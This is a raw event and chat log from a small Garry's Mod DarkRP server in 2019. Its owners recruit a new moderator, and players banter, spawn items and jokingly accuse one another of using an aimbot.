Mon Sep  2 17:48:33 2019	DrDerpenstein sups.gg (STEAM_0:0:13562763) has joined the game
Mon Sep  2 17:48:33 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 17:49:08 2019	DrDerpenstein (STEAM_0:0:13562763): /unbox
Mon Sep  2 17:51:44 2019	Derp (STEAM_0:0:52504530) has joined the game
Mon Sep  2 17:51:44 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 18:15:42 2019	Thomasツ (STEAM_0:0:121940340) has joined the game
Mon Sep  2 18:15:42 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 18:16:48 2019	Derp (STEAM_0:0:52504530): hello
Mon Sep  2 18:16:52 2019	Thomasツ (STEAM_0:0:121940340): Hi
Mon Sep  2 18:16:56 2019	Derp (STEAM_0:0:52504530): i hear u btw
Mon Sep  2 18:17:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 18:17:07 2019	Derp (STEAM_0:0:52504530): yeah im the owner and drderp is the co owner
Mon Sep  2 18:17:28 2019	Derp (STEAM_0:0:52504530): we do that so that people dont know of our rank so easily
Mon Sep  2 18:17:43 2019	Derp (STEAM_0:0:52504530): they can type @ and then a message and see what happens
Mon Sep  2 18:17:59 2019	Derp (STEAM_0:0:52504530): they can also report people and i think the reports stay there even when we log on and it pops up
Mon Sep  2 18:18:02 2019	Derp (STEAM_0:0:52504530): i could be wrong
Mon Sep  2 18:18:20 2019	Derp (STEAM_0:0:52504530): if u type @ only a menu should pop up
Mon Sep  2 18:18:25 2019	Thomasツ (STEAM_0:0:121940340): 
Mon Sep  2 18:18:26 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 18:18:36 2019	Thomasツ (STEAM_0:0:121940340): 
Mon Sep  2 18:18:50 2019	Derp (STEAM_0:0:52504530): oh yeah and u still can see our ranks if u click on us in the scoreboard its just harder to see
Mon Sep  2 18:19:02 2019	Derp (STEAM_0:0:52504530): nah its fine dude
Mon Sep  2 18:19:04 2019	Derp (STEAM_0:0:52504530): u have a valid point
Mon Sep  2 18:19:07 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 18:19:16 2019	Derp (STEAM_0:0:52504530): we just like to be hidden so that people who break rules do it in front of us
Mon Sep  2 18:19:22 2019	Derp (STEAM_0:0:52504530): yeah we have a forum
Mon Sep  2 18:19:32 2019	Thomasツ (STEAM_0:0:121940340): !forums
Mon Sep  2 18:19:38 2019	Derp (STEAM_0:0:52504530): nah lol
Mon Sep  2 18:19:43 2019	Derp (STEAM_0:0:52504530): we are still a WIP we just let people play
Mon Sep  2 18:19:52 2019	Derp (STEAM_0:0:52504530): although most of the important stuff is done
Mon Sep  2 18:20:04 2019	Derp (STEAM_0:0:52504530): we do 
Mon Sep  2 18:20:07 2019	Derp (STEAM_0:0:52504530): its bootleg as shit but it works
Mon Sep  2 18:20:14 2019	Derp (STEAM_0:0:52504530): aight
Mon Sep  2 18:20:23 2019	Derp (STEAM_0:0:52504530): https://discord.gg/nhgu8E
Mon Sep  2 18:21:16 2019	Derp (STEAM_0:0:52504530): thanks for joining btw
Mon Sep  2 18:21:25 2019	Derp (STEAM_0:0:52504530): sorry if the server seems fucking boring as shit
Mon Sep  2 18:21:36 2019	Derp (STEAM_0:0:52504530): our biggest struggle is getting players
Mon Sep  2 18:21:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned Vehicle prop_vehicle_jeep (sw_tractor)
Mon Sep  2 18:22:04 2019	Derp (STEAM_0:0:52504530): if u wanna ask me something just msg me on discord
Mon Sep  2 18:22:18 2019	Derp (STEAM_0:0:52504530): press F4 and click on info
Mon Sep  2 18:23:12 2019	Derp (STEAM_0:0:52504530): i put on the template that u need to have minimum 48 hours
Mon Sep  2 18:23:39 2019	Derp (STEAM_0:0:52504530): its just to see if u really are dedicated to the server or not
Mon Sep  2 18:24:03 2019	DrDerpenstein (STEAM_0:0:13562763): !wcd
Mon Sep  2 18:24:19 2019	Derp (STEAM_0:0:52504530): well if our entire playerbase that consists of like 5 people are all staff its not really gonna be of much help either
Mon Sep  2 18:25:13 2019	Derp (STEAM_0:0:52504530): i mean to be fair i did have that time requirement when the server had like an average of 7 people everyday
Mon Sep  2 18:25:17 2019	Derp (STEAM_0:0:52504530): i just havent changed it
Mon Sep  2 18:25:24 2019	Derp (STEAM_0:0:52504530): ill lower it to 24
Mon Sep  2 18:25:25 2019	Derp (STEAM_0:0:52504530): i think 24 is fair
Mon Sep  2 18:25:45 2019	Derp (STEAM_0:0:52504530): what staff would u like to be anyways
Mon Sep  2 18:25:48 2019	Derp (STEAM_0:0:52504530): like what position
Mon Sep  2 18:26:17 2019	Derp (STEAM_0:0:52504530): i mean at the beginning i would probably make u mod and then promote u pretty soon after if u arent a complete dickhead
Mon Sep  2 18:26:50 2019	Derp (STEAM_0:0:52504530): rip
Mon Sep  2 18:26:59 2019	Derp (STEAM_0:0:52504530): lmao
Mon Sep  2 18:27:09 2019	DrDerpenstein (STEAM_0:0:13562763) spawned Vehicle prop_vehicle_jeep (sw_tractor_trailer)
Mon Sep  2 18:27:16 2019	Derp (STEAM_0:0:52504530): :l
Mon Sep  2 18:27:19 2019	DrDerpenstein (STEAM_0:0:13562763) spawned Vehicle prop_vehicle_jeep (sw_tractor_trailer)
Mon Sep  2 18:27:23 2019	DrDerpenstein (STEAM_0:0:13562763) spawned Vehicle prop_vehicle_jeep (sw_tractor_trailer)
Mon Sep  2 18:27:29 2019	DrDerpenstein (STEAM_0:0:13562763) spawned Vehicle prop_vehicle_jeep (sw_tractor_trailer)
Mon Sep  2 18:27:34 2019	DrDerpenstein (STEAM_0:0:13562763) spawned Vehicle prop_vehicle_jeep (sw_tractor_trailer)
Mon Sep  2 18:27:46 2019	Derp (STEAM_0:0:52504530): that sounds like a fucking disaster
Mon Sep  2 18:28:09 2019	Derp (STEAM_0:0:52504530): im glad i havent gone to another server in a long ass time
Mon Sep  2 18:28:48 2019	Derp (STEAM_0:0:52504530): where are u taking us u fucking rapist
Mon Sep  2 18:29:03 2019	Derp was killed by DrDerpenstein with a cw_p99
Mon Sep  2 18:29:22 2019	Derp (STEAM_0:0:52504530): stay away from him hes gonna kidnap u at some point
Mon Sep  2 18:29:59 2019	Derp (STEAM_0:0:52504530): we have like 20 people on our discord server and like only 2 people play
Mon Sep  2 18:30:01 2019	Derp (STEAM_0:0:52504530): big rip
Mon Sep  2 18:30:17 2019	Derp (STEAM_0:0:52504530): its hard to get people to play on darkrp servers because there are so many of them
Mon Sep  2 18:31:03 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 18:31:55 2019	Thomasツ was killed by Himself with a suicide trick
Mon Sep  2 18:31:56 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 18:33:26 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT pvault_moneybag
Mon Sep  2 18:33:30 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT pvault_moneybag
Mon Sep  2 18:33:30 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT pvault_moneybag
Mon Sep  2 18:33:30 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT pvault_moneybag
Mon Sep  2 18:33:59 2019	Derp (STEAM_0:0:52504530): if u can get like 2-4 hours of playtime and apply on the forums ill make u a mod
Mon Sep  2 18:36:13 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 18:38:05 2019	Thomasツ (STEAM_0:0:121940340): 
Mon Sep  2 18:43:35 2019	bert simson (STEAM_0:1:179345279) has joined the game
Mon Sep  2 18:43:35 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 18:47:23 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): ?
Mon Sep  2 18:47:28 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): ???????????????????
Mon Sep  2 18:47:30 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): oh
Mon Sep  2 18:47:35 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): hello
Mon Sep  2 18:49:46 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 18:49:48 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): !??!
Mon Sep  2 18:49:58 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): I made it man, its called "Rope monster tight"
Mon Sep  2 18:50:16 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): theres also a loose one
Mon Sep  2 18:50:38 2019	Thomasツ (STEAM_0:0:121940340): // found a dupe that works
Mon Sep  2 18:50:40 2019	Thomasツ (STEAM_0:0:121940340): 
Mon Sep  2 18:50:47 2019	Thomasツ (STEAM_0:0:121940340): <hsv> ee </hsv>
Mon Sep  2 18:50:58 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // what do you mean one that works
Mon Sep  2 18:51:18 2019	Thomasツ (STEAM_0:0:121940340): // doesnt hit limit
Mon Sep  2 18:51:23 2019	bobbicus has a wonderful voice was killed by DrDerpenstein with a cw_ak74
Mon Sep  2 18:51:24 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 18:51:24 2019	DrDerpenstein was killed by Thomasツ with a cw_mp5
Mon Sep  2 18:51:30 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 18:53:02 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): rope dude
Mon Sep  2 18:53:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 18:53:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 18:53:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 18:53:17 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 18:53:18 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 18:53:19 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): there are trails just not a proper tool i dont think
Mon Sep  2 18:53:20 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:53:20 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:53:20 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:53:20 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:53:20 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:53:38 2019	bobbicus has a wonderful voice was killed by Thomasツ with a cw_mp5
Mon Sep  2 18:53:39 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 18:54:09 2019	Derp was killed by bobbicus has a wonderful voice with a cw_m1911
Mon Sep  2 18:54:10 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_m1911
Mon Sep  2 18:54:13 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 18:54:14 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 18:54:18 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /buypistolammo
Mon Sep  2 18:54:20 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /buypistol
Mon Sep  2 18:54:22 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /pistolammo
Mon Sep  2 18:54:24 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): shit
Mon Sep  2 18:54:38 2019	Thomasツ was killed by bobbicus has a wonderful voice with a cw_m1911
Mon Sep  2 18:54:40 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 18:54:44 2019	Thomasツ (STEAM_0:0:121940340): // reeeeee my gun
Mon Sep  2 18:55:25 2019	Thomasツ (STEAM_0:0:121940340): // can i get a gun again
Mon Sep  2 18:55:43 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /drop
Mon Sep  2 18:55:47 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:55:48 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:55:48 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 18:55:48 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 18:55:48 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 18:55:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 18:55:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 18:55:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 18:55:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 18:55:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 18:55:50 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 18:55:50 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 18:55:50 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 18:55:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 18:55:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 18:55:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 18:55:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 18:55:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 18:55:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 18:55:52 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 18:55:52 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 18:55:52 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 18:55:52 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 18:56:13 2019	Derp (STEAM_0:0:52504530) spawned Vehicle prop_vehicle_prisoner_pod (Pod)
Mon Sep  2 18:56:24 2019	Derp (STEAM_0:0:52504530): hop on in
Mon Sep  2 18:57:05 2019	Derp was killed by Thomasツ with a cw_makarov
Mon Sep  2 18:57:08 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 18:58:35 2019	Thomasツ (STEAM_0:0:121940340): // these printers suck ass
Mon Sep  2 18:58:44 2019	DrDerpenstein (STEAM_0:0:13562763): // our economy is balanced
Mon Sep  2 18:58:52 2019	DrDerpenstein (STEAM_0:0:13562763): // they provide plenty of money
Mon Sep  2 18:59:08 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): i think you might be lagging
Mon Sep  2 18:59:14 2019	DrDerpenstein (STEAM_0:0:13562763): im fine
Mon Sep  2 18:59:23 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): i am too dw
Mon Sep  2 19:00:22 2019	bobbicus has a wonderful voice was killed by Thomasツ with a cw_makarov
Mon Sep  2 19:00:23 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:00:39 2019	Thomasツ (STEAM_0:0:121940340): /invholster
Mon Sep  2 19:00:44 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): dude you lagging
Mon Sep  2 19:00:54 2019	Thomasツ (STEAM_0:0:121940340): /invholsyer
Mon Sep  2 19:00:55 2019	Thomasツ (STEAM_0:0:121940340): /invholster
Mon Sep  2 19:00:56 2019	DrDerpenstein (STEAM_0:0:13562763): i think u are
Mon Sep  2 19:01:10 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): I am not!
Mon Sep  2 19:02:12 2019	bobbicus has a wonderful voice was killed by Thomasツ with a cw_tr09_mp9
Mon Sep  2 19:02:14 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): TOMMY
Mon Sep  2 19:02:16 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:02:26 2019	Thomasツ (STEAM_0:0:121940340): /pm bob what
Mon Sep  2 19:02:37 2019	Thomasツ (STEAM_0:0:121940340): /pm bob who dis
Mon Sep  2 19:03:09 2019	DrDerpenstein (STEAM_0:0:13562763): // brb
Mon Sep  2 19:03:12 2019	DrDerpenstein (STEAM_0:0:13562763) disconnected
Mon Sep  2 19:03:33 2019	Thomasツ was killed by bobbicus has a wonderful voice with a cw_makarov
Mon Sep  2 19:03:35 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 19:03:48 2019	Thomasツ (STEAM_0:0:121940340): // bruh moment
Mon Sep  2 19:04:16 2019	Thomasツ (STEAM_0:0:121940340): // i lost my guns they wouldnt go in my inv
Mon Sep  2 19:04:23 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // i took them
Mon Sep  2 19:04:36 2019	Derp was killed by bobbicus has a wonderful voice with a cw_ws_m16a4
Mon Sep  2 19:04:39 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:05:34 2019	DrDerpenstein sups.gg (STEAM_0:0:13562763) has joined the game
Mon Sep  2 19:05:34 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:05:56 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) disconnected
Mon Sep  2 19:08:14 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:08:44 2019	Derp was killed by Entity [0][worldspawn] with a unknown
Mon Sep  2 19:08:45 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:09:14 2019	Derp was killed by DrDerpenstein with a cw_ak74
Mon Sep  2 19:09:18 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:09:48 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 19:09:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 19:09:49 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_healthkit
Mon Sep  2 19:09:50 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:09:50 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:09:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:09:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:09:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:09:51 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 19:09:53 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_grenade
Mon Sep  2 19:09:53 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_grenade
Mon Sep  2 19:09:53 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_grenade
Mon Sep  2 19:09:53 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:09:54 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:09:54 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 19:09:54 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 19:09:54 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 19:09:55 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 19:09:55 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:09:55 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 19:09:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:09:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:09:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 19:10:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 19:10:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 19:10:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 19:10:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 19:10:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 19:10:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 19:10:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 19:10:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 19:10:59 2019	Thomasツ (STEAM_0:0:121940340): // why is this inv pickup not working
Mon Sep  2 19:11:14 2019	Thomasツ (STEAM_0:0:121940340): // it onlky works every once i na while
Mon Sep  2 19:11:55 2019	Thomasツ (STEAM_0:0:121940340): /invholster
Mon Sep  2 19:12:02 2019	Thomasツ (STEAM_0:0:121940340): /invholster
Mon Sep  2 19:12:13 2019	Thomasツ (STEAM_0:0:121940340): /invhoklster
Mon Sep  2 19:12:15 2019	Thomasツ (STEAM_0:0:121940340): /invholster
Mon Sep  2 19:12:45 2019	bert simson (STEAM_0:1:179345279) has joined the game
Mon Sep  2 19:12:45 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:14:21 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:14:23 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:14:25 2019	Derp was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:14:27 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:14:31 2019	DrDerpenstein (STEAM_0:0:13562763): 
Mon Sep  2 19:14:43 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // accident sorry
Mon Sep  2 19:14:53 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /drop
Mon Sep  2 19:15:02 2019	bobbicus has a wonderful voice was killed by DrDerpenstein with a cw_ak74
Mon Sep  2 19:15:15 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:15:52 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:15:54 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:15:55 2019	Derp was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:15:56 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:16:04 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:16:06 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:16:10 2019	Thomasツ was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:16:11 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 19:16:18 2019	Derp was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:16:19 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:16:19 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:16:23 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:16:44 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:16:47 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:17:33 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:17:37 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:17:44 2019	Thomasツ was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:17:45 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 19:17:50 2019	Derp was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:17:53 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:18:02 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:18:04 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:18:26 2019	DrDerpenstein was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:18:30 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:18:35 2019	Derp was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:18:36 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:18:48 2019	Thomasツ was killed by bobbicus has a wonderful voice with a cw_mac11
Mon Sep  2 19:18:54 2019	Thomasツ (STEAM_0:0:121940340): // what gun does he have
Mon Sep  2 19:18:56 2019	Thomasツ (STEAM_0:0:121940340) spawned
Mon Sep  2 19:18:59 2019	bobbicus has a wonderful voice was killed by Derp with a cw_scorpin_evo3
Mon Sep  2 19:19:00 2019	DrDerpenstein (STEAM_0:0:13562763): // not sure
Mon Sep  2 19:19:00 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:19:03 2019	DrDerpenstein (STEAM_0:0:13562763): // glock?
Mon Sep  2 19:19:05 2019	Derp (STEAM_0:0:52504530): // he has the aimbot gun
Mon Sep  2 19:19:05 2019	Thomasツ (STEAM_0:0:121940340): // its op as fuck
Mon Sep  2 19:19:09 2019	Thomasツ (STEAM_0:0:121940340): // oh
Mon Sep  2 19:19:18 2019	Derp (STEAM_0:0:52504530): // nah seriously hes actually using aimbot
Mon Sep  2 19:19:18 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // what is aimbot gun wtf?!
Mon Sep  2 19:19:34 2019	bobbicus has a wonderful voice was killed by DrDerpenstein with a cw_ak74
Mon Sep  2 19:19:42 2019	Derp was killed by DrDerpenstein with a cw_ak74
Mon Sep  2 19:19:43 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:19:47 2019	Thomasツ (STEAM_0:0:121940340): // can i have it?
Mon Sep  2 19:19:49 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // dUde you can screengrab me im using pink
Mon Sep  2 19:19:49 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279) spawned
Mon Sep  2 19:19:55 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // blue
Mon Sep  2 19:19:57 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // orange
Mon Sep  2 19:19:59 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // purple
Mon Sep  2 19:20:05 2019	Thomasツ (STEAM_0:0:121940340): // can i have it?
Mon Sep  2 19:20:06 2019	Derp (STEAM_0:0:52504530): // i cant screengrab an aimbot
Mon Sep  2 19:20:11 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // sure you can
Mon Sep  2 19:20:27 2019	Thomasツ (STEAM_0:0:121940340): // can i have a stun gun
Mon Sep  2 19:20:51 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): Yeah dude he thinks im hacking
Mon Sep  2 19:21:02 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): I can moonwalk with that stungun
Mon Sep  2 19:21:03 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): give me it
Mon Sep  2 19:21:16 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): hahaha
Mon Sep  2 19:21:18 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): yeah i know
Mon Sep  2 19:21:29 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): i went big blatant
Mon Sep  2 19:21:52 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 19:21:52 2019	Thomasツ (STEAM_0:0:121940340): // give me cw_ws_m16a4
Mon Sep  2 19:22:04 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /drop
Mon Sep  2 19:22:06 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): there
Mon Sep  2 19:22:07 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): you go
Mon Sep  2 19:22:11 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): i spawn it for you
Mon Sep  2 19:22:18 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // give me a stungun man
Mon Sep  2 19:22:22 2019	DrDerpenstein was killed by Derp with a weapon_fists
Mon Sep  2 19:22:29 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 19:22:31 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): 
Mon Sep  2 19:22:39 2019	DrDerpenstein (STEAM_0:0:13562763): // pay for one
